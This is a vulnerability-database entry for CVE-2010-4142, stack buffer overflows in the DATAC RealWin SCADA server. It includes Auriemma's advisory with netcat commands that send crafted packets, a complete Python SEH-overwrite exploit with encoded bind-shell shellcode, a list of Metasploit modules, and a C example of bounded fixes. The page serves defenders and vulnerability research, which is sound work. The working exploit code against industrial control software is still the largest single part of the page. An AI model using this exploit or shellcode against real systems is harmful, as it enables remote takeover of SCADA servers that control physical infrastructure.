CVE-2010-4142

critical
Published 2010-11-02 · Modified 2026-04-29
CVSS v3
—
CVSS v4
—
not yet in upstream
VIR risk
10.0

Description

Multiple stack-based buffer overflows in DATAC RealWin 2.0 Build 6.1.8.10 and earlier allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long (1) SCPC_INITIALIZE, (2) SCPC_INITIALIZE_RF, or (3) SCPC_TXTEVENT packet. NOTE: it was later reported that 1.06 is also affected by one of these requests.

Predictions

Exploit likelihood
20%
Patch ETA
—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.


Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-15259 dos windows verified text · 2 KB
Luigi Auriemma · 2010-10-15

DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - Buffer Overflow

text exploit Source: Exploit-DB
Source: http://aluigi.org/adv/realwin_1-adv.txt

#######################################################################

                             Luigi Auriemma

Application:  DATAC RealWin
              http://www.dataconline.com/software/realwin.php
              http://www.realflex.com
Versions:     <= 2.0 (Build 6.1.8.10)
Platforms:    Windows
Bugs:         A] stack overflow in SCPC_INITIALIZE and SCPC_INITIALIZE_RF
              B] stack overflow in SCPC_TXTEVENT
Exploitation: remote, versus server
Date:         15 Oct 2010
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


"RealWin is a SCADA server package for medium / small applications."


#######################################################################

=======
2) Bugs
=======


-----------------------------------------------------------
A] stack overflow in SCPC_INITIALIZE and SCPC_INITIALIZE_RF
-----------------------------------------------------------

The service of the server running on port 912 is vulnerable to a
stack-based buffer overflow caused by the usage of sprintf() for
building a particular string with the data supplied by the attacker:

  sprintf(
    stack_buffer,
    "C:\\Program Files\\...path_of_RealWin...\\data\\crt\\fwd\\tel\\%s.%d",
    attacker_string,
    attacker_16bit_number);


----------------------------------
B] stack overflow in SCPC_TXTEVENT
----------------------------------

The same server is also vulnerable to another stack-based overflow
caused by the usage of strcpy() with the data supplied by the attacker.
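Added example, not part of Luigi Auriemma's advisory or of RealWin's own code: the bounded replacements for the two unsafe calls described in bugs A and B, in C. The install prefix, the 260-byte buffer and the input values are assumptions constructed for the example.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Install prefix and buffer size are assumptions for this example; the real
 * path in the advisory is elided ("...path_of_RealWin...").                 */
#define FWD_TEL_DIR "C:\\Program Files\\RealWin\\data\\crt\\fwd\\tel\\"
#define PATH_BUF_LEN 260

/* Bug A pattern from the advisory (do not use):
 *   sprintf(stack_buffer, FWD_TEL_DIR "%s.%d", attacker_string, attacker_16bit_number);
 * A name longer than the buffer overruns the stack. The bounded version below
 * formats into a fixed-size buffer and treats truncation as a malformed request.
 * Returns 1 on success, 0 when the input is rejected.                          */
int build_tel_path(char *out, size_t out_len, const char *name, uint16_t num)
{
    if (out == NULL || out_len == 0 || name == NULL)
        return 0;
    /* A file name taken from the wire should never carry path separators. */
    if (strpbrk(name, "\\/") != NULL)
        return 0;
    int n = snprintf(out, out_len, FWD_TEL_DIR "%s.%u", name, (unsigned)num);
    if (n < 0 || (size_t)n >= out_len) {
        out[0] = '\0';          /* would have truncated: reject, do not guess */
        return 0;
    }
    return 1;
}

/* Bug B pattern: strcpy() of the SCPC_TXTEVENT text into a fixed buffer.
 * Copy only the bytes actually received, after checking they fit with a
 * terminator, instead of trusting the peer to supply a NUL in time.        */
int copy_event_text(char *out, size_t out_len, const char *text, size_t text_len)
{
    if (out == NULL || text == NULL || out_len == 0 || text_len >= out_len)
        return 0;
    memcpy(out, text, text_len);
    out[text_len] = '\0';
    return 1;
}

int main(void)
{
    char path[PATH_BUF_LEN], big[600];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';              /* constructed oversized name */
    printf("normal name  : %d\n", build_tel_path(path, sizeof path, "alarm01", 7));
    printf("  -> %s\n", path);
    printf("600-byte name: %d\n", build_tel_path(path, sizeof path, big, 7));
    return 0;
}
```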


#######################################################################

===========
3) The Code
===========


http://aluigi.org/poc/realwin_1.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15259.zip (realwin_1.zip)

  nc SERVER 912 < realwin_1a.dat
  nc SERVER 912 < realwin_1b.dat
  nc SERVER 912 < realwin_1c.dat


#######################################################################

======
4) Fix
======


No fix.


#######################################################################
EDB-15337 remote windows verified python · 3 KB
blake · 2010-10-27

DATAC RealWin SCADA Server 1.06 - Remote Buffer Overflow

python exploit Source: Exploit-DB
# Exploit Title: RealWin SCADA System SEH Overwrite
# Date: 10-27-10
# Author: Blake
# Software Link: http://www.realflex.com/products/realwin/realwin.php
# Version: 1.06
# Tested on: Windows XP SP3 running in VMware Workstation (rfx)

import socket, sys

if len(sys.argv)!= 3:
    print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
    sys.exit(0)
 
host = sys.argv[1]
port = int(sys.argv[2])     # port 912 by default

# windows/shell_bind_tcp - 368 bytes Encoder: x86/shikata_ga_nai
# LPORT=4444, 
shellcode =(
"\xba\xe7\x26\x3b\xa1\x33\xc9\xb1\x56\xdb\xce\xd9\x74\x24\xf4"
"\x5d\x83\xc5\x04\x31\x55\x0b\x03\x55\xec\xc4\xce\x5d\x1a\x81"
"\x31\x9e\xda\xf2\xb8\x7b\xeb\x20\xde\x08\x59\xf5\x94\x5d\x51"
"\x7e\xf8\x75\xe2\xf2\xd5\x7a\x43\xb8\x03\xb4\x54\x0c\x8c\x1a"
"\x96\x0e\x70\x61\xca\xf0\x49\xaa\x1f\xf0\x8e\xd7\xef\xa0\x47"
"\x93\x5d\x55\xe3\xe1\x5d\x54\x23\x6e\xdd\x2e\x46\xb1\xa9\x84"
"\x49\xe2\x01\x92\x02\x1a\x2a\xfc\xb2\x1b\xff\x1e\x8e\x52\x74"
"\xd4\x64\x65\x5c\x24\x84\x57\xa0\xeb\xbb\x57\x2d\xf5\xfc\x50"
"\xcd\x80\xf6\xa2\x70\x93\xcc\xd9\xae\x16\xd1\x7a\x25\x80\x31"
"\x7a\xea\x57\xb1\x70\x47\x13\x9d\x94\x56\xf0\x95\xa1\xd3\xf7"
"\x79\x20\xa7\xd3\x5d\x68\x7c\x7d\xc7\xd4\xd3\x82\x17\xb0\x8c"
"\x26\x53\x53\xd9\x51\x3e\x3c\x2e\x6c\xc1\xbc\x38\xe7\xb2\x8e"
"\xe7\x53\x5d\xa3\x60\x7a\x9a\xc4\x5b\x3a\x34\x3b\x63\x3b\x1c"
"\xf8\x37\x6b\x36\x29\x37\xe0\xc6\xd6\xe2\xa7\x96\x78\x5c\x08"
"\x47\x39\x0c\xe0\x8d\xb6\x73\x10\xae\x1c\x02\x16\x60\x44\x47"
"\xf1\x81\x7a\x76\x5d\x0f\x9c\x12\x4d\x59\x36\x8a\xaf\xbe\x8f"
"\x2d\xcf\x94\xa3\xe6\x47\xa0\xad\x30\x67\x31\xf8\x13\xc4\x99"
"\x6b\xe7\x06\x1e\x8d\xf8\x02\x36\xc4\xc1\xc5\xcc\xb8\x80\x74"
"\xd0\x90\x72\x14\x43\x7f\x82\x53\x78\x28\xd5\x34\x4e\x21\xb3"
"\xa8\xe9\x9b\xa1\x30\x6f\xe3\x61\xef\x4c\xea\x68\x62\xe8\xc8"
"\x7a\xba\xf1\x54\x2e\x12\xa4\x02\x98\xd4\x1e\xe5\x72\x8f\xcd"
"\xaf\x12\x56\x3e\x70\x64\x57\x6b\x06\x88\xe6\xc2\x5f\xb7\xc7"
"\x82\x57\xc0\x35\x33\x97\x1b\xfe\x43\xd2\x01\x57\xcc\xbb\xd0"
"\xe5\x91\x3b\x0f\x29\xac\xbf\xa5\xd2\x4b\xdf\xcc\xd7\x10\x67"
"\x3d\xaa\x09\x02\x41\x19\x29\x07")


head = "\x64\x12\x54\x6A\x20\x00\x00\x00\xF4\x1F\x00\x00"
junk = "\x41" * 228
next_seh = "\xeb\x06\x90\x90"	# overwrites next seh
seh = "\xea\xe3\x02\x40" 		# seh overwritten at 232 bytes - 4002e3ea
nops = "\x90" * 20				# nop sled
junk2 = "\x42" * (7972 - len(shellcode)) # 1740 bytes for shellcode

print "\n====================================" 
print "DATAC RealWin 1.06 Buffer Overflow"
print "Written by Blake"
print "Discovered by Luigi Auriemma"
print "Tested on Windows XP SP3"
print "====================================\n"
 
print "[*] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((host,port))
except:
    print "[x] Error establishing connection\n"
    sys.exit(0)
 
print "[*] Sending payload"
s.send(head + junk + next_seh + seh + nops + shellcode + junk2 + "\r\n")
s.close()
print "[*] Payload sent"
raw_input("[*] Press any key to exit...\n")
EDB-16382 remote windows verified
Metasploit · 2010-11-30

DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE Buffer Overflow (Metasploit)

EDB-16383 remote windows verified
Metasploit · 2010-11-30

DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow (Metasploit)

EDB-16384 remote windows verified
Metasploit · 2010-11-24

DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow (Metasploit)


Metasploit modules

DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow
DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow
DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow

Application impact

Vendor    Product  Versions  Fixed
realflex  realwin  1.06      -
realflex  realwin  2.0       -

References

CWEs

CWE-119
